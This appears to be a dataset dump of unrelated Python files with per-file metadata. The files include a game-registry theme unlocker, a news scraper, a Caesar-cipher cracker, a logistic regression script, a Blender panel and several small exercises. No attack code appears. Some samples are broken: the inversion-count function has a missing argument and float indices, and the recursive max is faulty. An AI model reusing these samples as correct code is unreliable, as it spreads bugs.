texfile.split('.')\n\tnames.append(name)\n\nlatex_output_files = []\nfor filename in listdir('.'):\n\tfor name in names:\n\t\tif filename.startswith(name):\n\t\t\tlatex_output_files.append(filename)\n\nfor output_file in latex_output_files:\n\tif output_file.endswith('.pdf'):\n\t\trename(output_file, './ToPrint/'+output_file)\n\telse:\n\t\tremove(output_file)\n","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":6718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"164301071","text":"from numpy import int16, zeros\n\n#подсчет количества уникальных операций\ndef count_unique(matrix):\n\tstr_matrix_unique_elements = ''\n\tfor i in range(len(matrix)):\n\t\tfor j in range(len(matrix[i])):\n\t\t\tif not matrix[i][j] in str_matrix_unique_elements:\n\t\t\t\tstr_matrix_unique_elements = str_matrix_unique_elements + matrix[i][j]\n\treturn int(len(str_matrix_unique_elements)/2)\n\t\n#подсчет не встречающихся операций в строках \ndef count_diff(matrix, K, len_matrix):\n\tres_list = []\n\tres_dict = {}\n\tfor i in range(len(matrix)):\n\t\tif i == len_matrix:\n\t\t\tbreak\n\t\tres_list.append({(i, j): K - int(len(set(matrix[i]).symmetric_difference(set(matrix[j])))) for j in range(i , len_matrix) if i != j})\n\tfor i in res_list:\n\t\tif(type(i) == dict):\n\t\t\tres_dict.update(i)\n\treturn res_dict\n\n#форматированние вывода в виде квадратичной матрицы\ndef matrix_output(matrix, len_matrix):\n\tresult_matrix = zeros((len_matrix,len_matrix), dtype=int16)\n\tfor i in range(len_matrix):\n\t\tfor j in range(len_matrix):\n\t\t\tif (i, j) in matrix.keys():\n\t\t\t\tresult_matrix[i,j] = matrix[(i, j)]\n\t\t\t\tresult_matrix[j, i] = matrix[(i, j)]\n\treturn result_matrix\n\t\n\tif __name__ == '__main__':\n\t\tprint(\"GKS.py\")","sub_path":"gks.py","file_name":"gks.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"225627093","text":"import winreg\r\ntry:\r\n invaxionReg=winreg.OpenKey(winreg.HKEY_CURRENT_USER,r\"SOFTWARE\\Aquatrax\\INVAXION\",0,winreg.KEY_ALL_ACCESS)\r\nexcept FileNotFoundError:\r\n print(\"No invaxion data founded! Does invaxion be installed on this computer?\\n未找到音灵的游戏数据! 此电脑上安装了音灵吗?\")\r\n input(\"Press any key to contiune.../按任意键继续……\")\r\n exit()\r\ntry:\r\n i=0\r\n while True:\r\n if winreg.EnumValue(invaxionReg,i)[0].find(\"Offline_PlayerThemeList\")!=-1:\r\n global index\r\n index=i\r\n break\r\n i+=1\r\nexcept WindowsError:\r\n print(\"No invaxion data founded! Have you played invaxion online before April 7th, 2021?\\nYou can download a save file by visiting https://share4nothing.ml/Share/\\n未找到音灵的游戏数据! 是否在停服前进行过在线游戏?\\n你可以通过访问https://share4nothing.ml/Share/来获取一份存档!\")\r\n input(\"Press any key to contiune.../按任意键继续……\")\r\n exit()\r\nwinreg.SetValueEx(invaxionReg,winreg.EnumValue(invaxionReg,index)[0],0,winreg.REG_BINARY,b'[{\"themeId\":1},{\"themeId\":2},{\"themeId\":3},{\"themeId\":4},{\"themeId\":5},{\"themeId\":6},{\"themeId\":7},{\"themeId\":8},{\"themeId\":9},{\"themeId\":10},{\"themeId\":11},{\"themeId\":12},{\"themeId\":13},{\"themeId\":14}]\\x00')\r\nwinreg.CloseKey(invaxionReg)\r\nprint(\"Unlocked/解锁成功\")\r\ninput(\"Press ENTER to contiune.../按回车键继续……\")\r\n\r\n","sub_path":"Unlock-Theme.py","file_name":"Unlock-Theme.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"141794452","text":"\"\"\"\n数组中的逆序对\n题目;在数组中的两个数字如果前面一个数字大于后面数字,则这两个数字组成一个逆序对。\n输入一个数组,求这个数组中的逆序对的总数\n 思路:1.从第一个开始比较,时间O(n2)\n 2.归并排序算法,时间O(nlogn),空间O(n)\n 首先拆分进行比较,达到要求的记录,然后从大到小正确排序,可以使用双指针进行排序,不断归并过程\n\"\"\"\nimport copy\n\n\ndef get_inverse_pairs(nums):\n if not nums:\n return 0\n start, end = 0, len(nums) - 1\n tmp = copy.deepcopy(nums)\n return inverse_pairs(tmp, start, )\n\n\ndef inverse_pairs(tmp, start, end):\n if start == end:\n return 0\n mid = (end - start) / 2\n left = inverse_pairs(tmp, start, start + mid)\n right = inverse_pairs(tmp, start + mid + 1, end)\n\n count = 0\n l_right, r_right = start + mid, end\n t = []\n while l_right >= start and r_right >= start + mid + 1:\n if tmp[l_right] > tmp[r_right]:\n t.append(tmp[l_right])\n count += (r_right - mid - start)\n l_right -= 1\n else:\n t.append(tmp[r_right])\n r_right -= 1\n while l_right >= r_right:\n t.append(tmp[l_right])\n l_right -= 1\n while r_right >= start + mid + 1:\n t.append(tmp[r_right])\n r_right -= 1\n tmp[start:end + 1] = t[::-1]\n return count + left + right\n","sub_path":"InversePairs.py","file_name":"InversePairs.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"444646474","text":"# 모듈 추출하기\nimport urllib.request\nfrom bs4 import BeautifulSoup\nimport time\n\n# 기사 목록을 가져 오기\nurl = 'https://news.naver.com/main/home.nhn'\nhtml = urllib.request.urlopen(url)\nsoup = BeautifulSoup(html,'html.parser')\n\nresults = soup.select('.mlist2.no_bg a') #strong\n\nwith open('test.txt','w',encoding='utf-8') as fp:\n\tfp.write('')\n\nfor result in results:\n\t# 기사 가져 오기\n\t# print(result.attrs['href'])\n\turl_article = result.attrs['href']\n\thtml = urllib.request.urlopen(url_article)\n\tsoup_article = BeautifulSoup(html,'html.parser')\n\tcontent = soup_article.select_one('#articleBodyContents')\n\t# print(content.contents)\n\t\n\t# 가공 하기\n\toutput = ''\n\tfor item in content.contents:\n\t\tstripped = str(item).strip()\n\t\tif stripped == '':\n\t\t\tcontinue\n\t\tif stripped[0] not in ['<','/']:\n\t\t\toutput += str(item).strip()\n\twcontent = output.replace('본문 내용TV플레이어','')\n\tprint(wcontent)\n\tprint('-'*70)\n\ttime.sleep(1)\n\twith open('test.txt','a',encoding='utf-8') as fp:\n\t\tfp.write(wcontent)","sub_path":"lesson109.py","file_name":"lesson109.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"227127243","text":"# coding=utf-8\nimport unittest,time\nfrom common.browser_engine import BrowserEngine\nfrom testsuites.auto_testcase.Crm_Case.ordercare import *\nfrom testsuites.auto_testcase.Crm_Case.vipcare import *\n\n#周年关怀\nclass Crm_HomePage(unittest.TestCase):\n def setUp(self):\n drivers=BrowserEngine(object)\n self.lcs=drivers.open_browser(self)\n\n def test_crmhomepage(self):\n Vip_Care(self.lcs).vip_timecare_type(\"周岁礼\")\n Vip_Care(self.lcs).time_care_common(2)\n self.lcs.close()\n\n def tearDown(self):\n self.lcs.quit()\n time.sleep(5)\nif __name__=='__main__':\n unittest.main()","sub_path":"testsuites/custom_function/Crm_Function/vipcare/test_year_care.py","file_name":"test_year_care.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"570023072","text":"# Use frequency analysis to find the key to ciphertext.txt,\n# and then decode it.\n\n# Your code here\ndef letter_count(text):\n \"\"\"\n @params text is string of any length\n\n letter_count takes a string and returns a dictionary of the count of each specific\n character in the following format: {\"A\": 54, \"B\": 12, ...}\n \"\"\"\n\n # the count does not include the following characters\n ignore = '\" : ; , . - + = / \\ | [ ] { } ( ) * ^ & ? ! \\''.split(\" \")\n ignore.extend([\" \", \"\\n\"])\n\n # counting code\n counts = {}\n for i in text:\n if i not in counts and i not in ignore:\n counts[i] = 0\n if i not in ignore:\n counts[i] += 1\n\n # return the dictionary\n return counts\n\n\ndef readfile(filename):\n # reads in a file and returns the text as a whole block\n with open(filename) as f:\n text = f.read()\n return text\n\n\ndef file_decode(filename):\n \"\"\"\n @params filename is a string filename relative to the root of the project,\n or wherever the terminal root is that's runnign the program\n\n file_decode reads in a file that is encoded with a simple caesar cipher, where\n individual letters are mapped 1:1 to another distinct letter in the alphabet, and\n decodes it, returning a string of the whole decoded file\n\n this function assumes all letters in the file are uppercase and that symbols\n and spaces in the file are not encoded\n \"\"\"\n\n # an array listing the letters of the english language in order of relative frequency\n general_frequency = [\n \"E\", \"T\", \"A\", \"O\", \"H\", \"N\", \"R\", \"I\", \"S\", \"D\", \"L\", \"W\", \"U\", \"G\", \"F\", \"B\", \"M\", \"Y\", \"C\", \"P\", \"K\", \"V\", \"Q\", \"J\", \"X\", \"Z\"]\n\n # read in the file\n text = readfile(filename)\n # store a count of the letters into a dictionary d\n d = letter_count(text)\n # convert dictionary elements into an array of tuples\n input_frequency = [item_tuple for item_tuple in d.items()]\n # sort the array based on frequency (second tuple element) from high to low\n input_frequency.sort(key=lambda e: e[1], reverse=True)\n # map the sorted list of tuples into a sorted array of just the letters (first tuple element)\n input_frequency = [x for x, y in input_frequency]\n\n \"\"\"\n This array should, with a *high probability* of correctness, map 1:1 with the\n corresponding *decoded* letter in general_frequency! So to decode, all we have\n to do is convert l[index] -> general_frequency[index]\n \"\"\"\n\n # initialize empty return string\n newText = \"\"\n # iterate over every character in the file\n for cur in range(len(text)):\n # if the character is alphabetical\n if text[cur].isalpha():\n try:\n # attempt to find the index of that letter in our sorted array\n frequency_index = input_frequency.index(text[cur])\n # in our return text, return the *decoded* character with the same index\n newText += general_frequency[frequency_index]\n except:\n # if that fails, the character is either not a letter or there's an issue\n # with the mapping indices, in which case the original character is maintained\n newText += text[cur]\n else:\n # if the character is for sure not a letter, don't change it\n newText += text[cur]\n\n # return the *mostly or completely* decoded string\n return newText\n\n\nif __name__ == \"__main__\":\n print(file_decode(\"applications/crack_caesar/ciphertext.txt\"))\n","sub_path":"applications/crack_caesar/crack_caesar.py","file_name":"crack_caesar.py","file_ext":"py","file_size_in_byte":3527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"560630798","text":"#!/bin/python\n# import ROOT in batch mode\nimport sys\nimport re\nimport argparse\noldargv = sys.argv[:]\nsys.argv = [ '-b-' ]\nimport ROOT\nROOT.gROOT.SetBatch(True)\nsys.argv = oldargv\n\n# ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ----\n\nclass customAction(argparse.Action):\n def __call__(self, parser, args, values, option_string=None):\n setattr(args, self.dest, values.split(','))\n\ndef get_comma_separated_args(self, arg_line):\n return arg_line.split(',')\n\n# ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ----\n\n# Load the CalibrationFile format\nROOT.gSystem.Load(\"lib/H4Dict.so\")\n\ntrees={}\nmergedFile = ROOT.TFile(sys.argv[1], \"RECREATE\")\nheadFile = ROOT.TFile(sys.argv[2], \"READ\")\nheadFile.cd()\ntrees[\"h4\"]=ROOT.TChain(\"h4\", \"main_h4reco_tree\") \nnextKey = ROOT.TIter(ROOT.gDirectory.GetListOfKeys())\n \nwhile True:\n key = nextKey()\n if key == nextKey.End()():\n break\n ## keep only the highest cycle number for each key and only TTree keys \n obj = key.ReadObj()\n if obj.IsA().GetName() == \"TTree\":\n trees[key.GetName()]= ROOT.TChain(key.GetName(), key.GetTitle())\n trees[key.GetName()].SetDirectory(0)\n else:\n mergedFile.cd()\n obj.Write(key.GetName()) \n\nfor filename in sys.argv[2:]:\n for tree_name in trees:\n trees[tree_name].AddFile(filename)\n\nfor tree_name in trees:\n if tree_name == \"h4\" or tree_name == \"wf\":\n continue\n mergedFile.cd()\n trees[tree_name].Merge(mergedFile, 0, \"keep\")\n trees[tree_name].BuildIndex(\"index\")\n trees[\"h4\"].AddFriend(tree_name)\n\nmergedFile.cd()\ntrees[\"h4\"].BuildIndex(\"index\")\ntrees[\"h4\"].Merge(mergedFile, 0, \"keep\")\n\nmergedFile.Close()\n","sub_path":"scripts/merger.py","file_name":"merger.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"265385098","text":"# Copyright Wuguyannian All Rights Reserved.\r\n\r\nimport bpy\r\nfrom ..functions import utilities\r\n\r\nclass UE_SKELETON_PT_Panel(bpy.types.Panel):\r\n \"\"\"\r\n This class defines the user interface for the panel in the tab in the 3d view\r\n \"\"\"\r\n bl_label = 'UE Skeleton Toolkit'\r\n bl_space_type = 'VIEW_3D'\r\n bl_region_type = 'UI'\r\n bl_category = 'UE Skeleton'\r\n\r\n def draw(self, context):\r\n \"\"\"\r\n This function overrides the draw method in the Panel class. The draw method is the function that\r\n defines the user interface layout and gets updated routinely.\r\n\r\n :param object context: The 3d view context.\r\n \"\"\"\r\n\r\n properties = bpy.context.window_manager.ueskeleton\r\n\r\n # set source skeleton name to the object picker\r\n object_picker = utilities.get_picker_object().constraints[0]\r\n if object_picker.target:\r\n if properties.source_skeleton_name != object_picker.target.name:\r\n properties.source_skeleton_name = object_picker.target.name\r\n else:\r\n if properties.source_skeleton_name != '':\r\n properties.source_skeleton_name = ''\r\n\r\n layout = self.layout\r\n\r\n # source skeleton selector\r\n box = layout.box()\r\n row = box.row()\r\n row = row.split(factor=0.90, align=True)\r\n row.prop(object_picker, 'target', text='Source')\r\n\r\n # enable the layout if an armature is selected\r\n validate_results = utilities.validate_source_skeleton_object(properties)\r\n layout = layout.column()\r\n layout.enabled = validate_results[0]\r\n\r\n if validate_results[1] and not layout.enabled:\r\n row = layout.row()\r\n row.alert = True\r\n row.label(text= 'It is not a skeleton object!')\r\n\r\n # apply the root rotation\r\n if layout.enabled and not utilities.validate_source_skeleton_rotation(properties):\r\n row = layout.row()\r\n row.alert = True\r\n row.label(text= 'needed to applay the rotation!')\r\n\r\n # template dropdown\r\n row = layout.row()\r\n row.label(text='Template:')\r\n if properties.selected_skeleton_template in [properties.default_template]:\r\n row = layout.row()\r\n row.prop(properties, 'selected_skeleton_template', text='')\r\n else:\r\n row = layout.split(factor=0.90, align=True)\r\n row.prop(properties, 'selected_skeleton_template', text='')\r\n row.operator('ueskeleton.remove_template_folder', icon='PANEL_CLOSE')\r\n\r\n box = layout.box()\r\n row = box.row()\r\n row.scale_y = 2.0\r\n row.operator('ueskeleton.convert_to_epic_skeleton', text='Convert')","sub_path":"ui/view_3d.py","file_name":"view_3d.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"556293749","text":"print(\"informar numero quadrado, triplo e quartuplo\")\n\nn1 = int(input(\" digite um numero:\"))\nn2 = int(input(\"digite outro numero:\"))\nn3 = int(input(\"digite o terceiro numero:\"))\n\nquadrado = n1 * n2\ntriplo = n2 * 3\nquartuplo = n3 * 4\n\nprint(\"raiz quadrada de \" + str(quadrado))\nprint(\"raiz tripla de \" + str(triplo))\nprint(\"raiz quartupla\" + str(quartuplo))\n","sub_path":"jacivan033/questao2.py","file_name":"questao2.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"235646747","text":"'''\nIvan Leon\nAdvent of Code\nwww.adventofcode.com\nDay 1 Part 2\n'''\n# Takes in input file name and returns list of instructions\ndef readInput(filename):\n f = open(filename, 'r')\n f = f.readlines()[0].split(', ')\n\n temp = []\n for i in f:\n turn = i[0]\n amount = int(i[1:len(i)])\n inst = [turn, amount]\n temp.append(inst)\n\n return temp\n\n\ndef turnRight(amount, position):\n pos = position\n if pos[2] == 3:\n pos[2] = 0\n elif pos[2] < 3:\n pos[2] += 1\n\n # 0 -> North | 1 -> East\n # 2 -> South | 3 -> West\n\n if pos[2] == 0:\n pos[1] += amount\n elif pos[2] == 1:\n pos[0] += amount\n elif pos[2] == 2:\n pos[1] -= amount\n elif pos[2] == 3:\n pos[0] -= amount\n\n return pos\n\ndef turnLeft(amount, position):\n pos = position\n if pos[2] == 0:\n pos[2] = 3\n elif pos[2] > 0:\n pos[2] -= 1\n\n # 0 -> North | 1 -> East\n # 2 -> South | 3 -> West\n\n if pos[2] == 0:\n pos[1] += amount\n elif pos[2] == 1:\n pos[0] += amount\n elif pos[2] == 2:\n pos[1] -= amount\n elif pos[2] == 3:\n pos[0] -= amount\n\n return pos\n\n\n\n\nif __name__ == '__main__':\n position = [0,0,0]\n SOLUTION = []\n\n\n instructions = readInput('input.txt')\n locations = []\n print(len(locations))\n\n for step in instructions:\n if len(locations) == 0:\n # continue\n # print(\"FUCK\")\n pass\n else:\n for p in locations:\n # print(\"this\")\n if p == position:\n SOLUTION = position\n dist = abs(SOLUTION[0]+SOLUTION[1])\n print(\"Easter Bunny HQ is at: (\",SOLUTION[0],\",\",SOLUTION[1],\")\" )\n\n\n\n if step[0]=='R':\n # turn right\n for i in range(0,step[1]):\n locations.append(position)\n position = turnRight(1, position)\n else:\n # turn left\n for i in range(0,step[1]):\n locations.append(position)\n position = turnLeft(1, position)\n\n\n # SOLUTION\n # print(position)\n # print(position[0]+position[1])\n\n\n\n\n\n","sub_path":"AoC_01_Taxicab/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"339870989","text":"from __future__ import division # for python2 only\n\nimport numpy as np\nimport math\nimport sys\n\n## Need to modify: 0.0 to ??\nlambda_parameter=0.0\n##\n\n## import data\n\nLabel_column=2\n\nTrain = np.loadtxt(\"train.txt\",delimiter=\",\")\ntheta_0_append = np.c_[[1.0] * len(Train.T[0]),Train]\nX = np.delete(theta_0_append,-1,1)\nY = Train[:,Label_column]\n\nTest = np.loadtxt(\"test.txt\",delimiter=\",\")\ntheta_0_append_test = np.c_[[1.0] * len(Test.T[0]),Test]\nX_test = np.delete(theta_0_append_test,-1,1)\nY_test = Test[:,Label_column]\n\n## scaling\nXT = X.T\nfor h in range(len(XT)):\n x = XT[h]\n mean = np.mean(x)\n max = x[np.where(np.amax(x) == x)[0][0]]\n min = x[np.where(np.amin(x) == x)[0][0]]\n r = (max - min) / 2\n if r != 0:\n XT[h] = (XT[h] - mean) / r\n \n\nXT_test = X_test.T\nfor h2 in range(len(XT_test)):\n XT_test[h2] = (XT_test[h2] - mean) / r\n\nfor l in range(0, 100):\n ## gradient decent\n m = len(X)\n n = len(X[0])\n th = np.zeros(n)\n\n alpha = 0.1\n achange = 1.0\n steps = 0\n lambda_parameter = l / 1.0\n\n while achange > 0.0001:\n change = 0.0\n steps += 1\n\n for i in range(m): # training samples\n x = X[i]\n y = Y[i]\n for j in range(n): #features\n theta = th[j]\n \n # j=0\n if j == 0:\n j_th = (1/m) * ((1/(1+np.exp(-np.dot(x,th.T))))-y) * x[j]\n # j>=1\n else:\n sigmoid = 1/(1+np.exp(-np.dot(x,th.T)))\n j_th = (1/m) * ((1/(1+np.exp(-np.dot(x,th.T))))-y) * x[j] + (lambda_parameter/m) * th[j]\n \n new_theta = theta - alpha * j_th\n change += new_theta - theta\n th[j] = new_theta\n achange = math.fabs(change)\n #print(steps,change, end='\\r')\n #print(steps,change)\n\n ## classification \n\n ## closed accuracy\n Hypo=np.array(1/(1+np.exp(-np.dot(X,th.T))))\n\n true=0\n n=0\n\n for k in range(m):\n n += 1\n if (Hypo[k] >= 0.5 and Y[k] == 1) or (Hypo[k] < 0.5 and Y[k] == 0):\n true += 1\n\n #print(\"Closed Accuracy:\",true/n)\n\n ## open accuracy\n\n Hypo_test=np.array(1/(1+np.exp(-np.dot(X_test,th.T))))\n\n true_test=0\n n_test = 0\n m_test = len(X_test)\n\n for k2 in range(m_test):\n n_test += 1\n if (Hypo_test[k2] >= 0.5 and Y_test[k2] == 1) or (Hypo_test[k2] < 0.5 and Y_test[k2] == 0):\n true_test += 1\n \n #print(\"Open Accuracy:\",true_test/n_test)\n\n print(lambda_parameter, '\\t', true/n, '\\t', true_test/n_test)\n","sub_path":"4_regularization/Reguralized_LR/reguralized_LR.py","file_name":"reguralized_LR.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"584124442","text":"# a simple event framework so we can connect together decoupled logic\nfrom lemon_pi.shared.events import Event\n\n# the car is moving\nMovingEvent = Event(\"Moving\", suppress_logs=True)\n\n# the car is not moving\nNotMovingEvent = Event(\"NotMoving\", suppress_logs=True)\n\n# the car is exiting the race track and entering the pits\nLeaveTrackEvent = Event(\"LeaveTrack\", debounce_time=30)\n\n# the car is entering the race track\nEnterTrackEvent = Event(\"EnterTrack\", debounce_time=30)\n\n# a lap has been completed\n# lap_count= int\n# lap_time= float\nCompleteLapEvent = Event(\"CompleteLap\")\n\n# a request to exit the application\nExitApplicationEvent = Event(\"ExitApplication\")\n\n# the car should transmit status on radio\nRadioSyncEvent = Event(\"RadioSync\", debounce_time=30)\n\n### State Change Events\n\n# the car is setting off from pits\nStateChangeSettingOffEvent = Event(\"StateChangeSettingOff\", debounce_time=10)\n\n# the car is parked in the pits\nStateChangePittedEvent = Event(\"StateChangePitted\")\n\n### OBD Events\nOBDConnectedEvent = Event(\"OBD-Connected\")\nOBDDisconnectedEvent = Event(\"OBD-Disconnected\")\n\n### GPS Events\nGPSConnectedEvent = Event(\"GPS-Connected\")\nGPSDisconnectedEvent = Event(\"GPS-Disconnected\")\n\n### Refuel event\n# percent_full=\nRefuelEvent = Event(\"Refuel\")\n\n### Car has come to a halt\nCarStoppedEvent = Event(\"CarStopped\", suppress_logs=True, debounce_time=10)\n\n########## Incoming Radio Events\n\n# emit() will contain\n# text=\n# duration_secs=\nDriverMessageEvent = Event(\"driver-message\")\n\n# emit() will contain\n# text=\nDriverMessageAddendumEvent = Event(\"driver-message-addendum\")\n\n# emit() will contain\n# flag=(GREEN|YELLOW|RED|BLACK|UNKNOWN)\nRaceFlagStatusEvent = Event(\"flag-status\")\n\n# emit() will contain\n# lap_count=\n# ts=\nLapInfoEvent = Event(\"lap-info\")\n\n#\nRadioReceiveEvent = Event(\"radio-rx\")\n\n# This wraps an initial event, unleashed by the button push\n# event=\n# button=0 the id of the button that was pushed\nButtonPressEvent = Event(\"btn\", debounce_time=0.25)\n\n# an audio alarm\n# message=\nAudioAlarmEvent = Event(\"alrm\", debounce_time=60)\n\n# an event indicating the cars position in the race\n# pos=\n# pos_in_class=\n# car_ahead=\n# gap=\nRacePositionEvent = Event(\"rpos\")\n\n\n\n\n","sub_path":"lemon_pi/car/event_defs.py","file_name":"event_defs.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"370656755","text":"# 1) Nested List\n''' result = []\n\n\ndef single_list(nestedlist):\n for value in nestedlist:\n if isinstance(value, list):\n single_list(value)\n else:\n result.append(value)\n\n\nnestedlist = [[1, 2], [3], [[[4, 5, 6]]]]\nsingle_list(nestedlist)\nprint(result) '''\n\n# ----------------------------------------------------\n# 2) Nested Dictionary\nresult_list = []\n\n\ndef true_value(nesteddict):\n for key, val in nesteddict.items():\n # print(\"key is \", key, 'value is ', val)\n if isinstance(val, dict):\n # print(\"inside isinstance :\", val)\n true_value(val)\n else:\n print(\":\")\n return result_list.append(key)\n # if val.values():\n # print(\"one more inside :\", val.values())\n # true_value(val)\n # elif val.values() == True:\n # print(\"true values are\", val.keys)\n # else:\n # res = result_list.append(val)\n # return res\n\n\nnested_dict = {\n 'user': {'add': False, 'delete': True},\n 'product': {'add': True, 'delete': False}\n}\n\n# def true_value(nesteddict):\n# for key, val in nesteddict.items():\n# print(key, val)\n# if val:\n# answer = '{}{}'.format(key,val)\n# q =result_list.append(answer)\n#\n# return q\n#\n# nesteddict = {'add': False, 'delete': True,'formmatt':True}\n# true_value(nesteddict)\n# print(result_list)\ntemp_list = []\n\n\ndef parser(data, k=None):\n for key, value in data.items():\n if isinstance(value, dict):\n parser(value, key)\n elif value is True:\n parsed_key = '{}_{}'.format(k, key)\n temp_list.append(parsed_key)\n\n\n# for key, value in nested_dict.items():\n# for key1, value1 in value.items():\n# if value1 is True:\n# parsed_key = '{}_{}'.format(key, key1)\n# temp_list.append(parsed_key)\n# parser(data=nested_dict)\n# print(temp_list)\n\n\nsearch_dict = {\n 'user1': {'address': ['banashankari', 'test'], 'number': 123456},\n 'user2': {'address': ['marathalli', 'test'], 'number': 456787},\n 'user3': {'address': ['mara', 'tera'], 'number': 456787},\n 'user4': {'address': ['para', 'mara'], 'number': 456787}\n\n}\n\n\n# solution by nishant\n# def search_params(data, param, value):\n# result_list2 = []\n# for k, v in data.items():\n# if data[k][param] is value:\n# result_list2.append(k)\n# return result_list2\n# print(search_params(search_dict, 'number', 123456))\n\n# vivek\n\ndef search_params(data, param, value):\n result_list3 = []\n for key, val in search_dict.items():\n # print(\"for: \", data[key][param])\n for list_parse in data[key][param]:\n # print(\"for1: \", list_parse)\n if list_parse == value:\n # print(\"list_parse:\", list_parse, \"value:\", value)\n result_list3.append(key)\n return result_list3\n\n\nprint(search_params(search_dict, 'address', value='para'))\n","sub_path":"newproject2_ecomm/src/ecommerce/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"556941038","text":"# File: max.py\n# Author: Jesse Ponugoti\n# NSID: vip670\n# Student ID: 11220274\n# Course: CMPT 145 L12\n\ndef maximum(lst):\n\t\"\"\"\n\tPurpose\n\t Recursively find the max value in a list\n\tPre-conditions:\n\t :param lst: a list with integers\n\tPost-conditions:\n\t\tNone\n\tReturn:\n\t\tThe max value in the input list of integers\n\t\"\"\"\n\tdef maximum1(lst):\n\t\tm = maximum(lst[1:])\n\t\treturn m if m > lst[0] else lst[0]\n\n\tdef maximum2(lst):\n\t\trest = len(lst)/2\n\t\tm1 = maximum1(lst[:rest])\n\t\tm2 = maximum1(lst[rest+1:])\n\t\treturn maximum([m1, m2])\n\n\tif len(lst) == 1:\n\t\treturn lst[0]\n\telse:\n\t\treturn maximum2(lst)\n\n\nlst = [1,2,3,4,5,6,7,8,9,10]\nprint('max of', lst, 'is', maximum(lst))\n\n","sub_path":"labs/lab5/max.py","file_name":"max.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"633483114","text":"#!/usr/bin/env python\n\"\"\"This module creates an empty canvas for the exam.\"\"\"\nfrom functools import partial\n\nfrom matplotlib.ticker import MaxNLocator\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\n# We want to show the shape and population differences in the cost functions.\ndef cost_education(group, y):\n \"\"\"This function calculates the cost of education.\"\"\"\n if group in ['high']:\n cost = 2 / 3 * y\n else:\n cost = y\n return cost\n\n\ndef benefit_education(y_star, y):\n \"\"\"This function calculates the benefit of education.\"\"\"\n if y < y_star:\n benefit = 1.0\n else:\n benefit = 2.0\n return benefit\n\n\ndef unconditional_expected_marginal_product(q):\n \"\"\"This function calculates the unconditional expected marginal product.\"\"\"\n return 2.0 - q\n\n\ndef surplus_education(group, y_star, y):\n \"\"\"This function calculates the surplus from education.\"\"\"\n cost = cost_education(group, y)\n bene = benefit_education(y_star, y)\n return bene - cost\n\n\ndef align_plots(ax, ylabel, xlim=[0, 3], ylim=[0, 3], y_star=1.5):\n ax.set_xlabel('Education')\n ax.set_ylabel(ylabel)\n ax.set_xlim(*xlim)\n ax.set_ylim(*ylim)\n\n if y_star is not None:\n ax.axvline(y_star, color='lightgrey', linestyle='--')\n ax.text(y_star - 0.05, ylim[0] - 0.175, r'$y^*$')\n\n ax.yaxis.get_major_ticks()[0].set_visible(False)\n ax.yaxis.set_major_locator(MaxNLocator(integer=True))\n ax.xaxis.set_major_locator(MaxNLocator(integer=True))\n\n return ax\n\ndef plots_market_structure(y_star):\n \"\"\"This function plots the graphs for the analysis of the market structure.\"\"\"\n\n for is_canvas in [False, True]:\n\n ax = plt.figure().add_subplot(111)\n ax.set_xlabel(r'$q_L$')\n ax.set_ylabel('Surplus')\n ax.set_xlim([0, 1])\n ax.set_ylim([0, 3])\n\n if not is_canvas:\n\n fname = 'fig-introduction-spence-market-structure.png'\n ax.set_xticks([0, 0.5, 1])\n\n surplus_analysis = partial(surplus_education, 'high', y_star)\n surplus_analysis = np.vectorize(surplus_analysis)\n y_values = surplus_analysis(np.tile(y_star, 1000))\n ax.plot(x_values, y_values, label='high productivity')\n\n surplus_analysis = partial(surplus_education, 'low', y_star)\n surplus_analysis = np.vectorize(surplus_analysis)\n y_values = surplus_analysis(np.tile(0, 1000))\n ax.plot(x_values, y_values, label='low productivity')\n\n y_values = unconditional_expected_marginal_product(x_values)\n ax.plot(x_values, y_values, label='no-signalling wage')\n ax.axvline(5/6, color='lightgrey', linestyle='--')\n\n else:\n\n fname = 'fig-introduction-spence-market-structure-canvas.png'\n ax.set_xticks([0, 0.5, 1])\n\n ax.yaxis.get_major_ticks()[0].set_visible(False)\n ax.yaxis.set_major_locator(MaxNLocator(integer=True))\n ax.legend()\n\n plt.savefig(fname)\n\n\ndef plots_surplus(y_star):\n \"\"\"This function plots the graphs for the analysis of the group surpluses.\"\"\"\n for is_canvas in [True, False]:\n\n ax = plt.figure().add_subplot(111)\n\n if is_canvas:\n ax = align_plots(ax, 'Surplus', ylim=[-2, 2], y_star=None)\n fname = 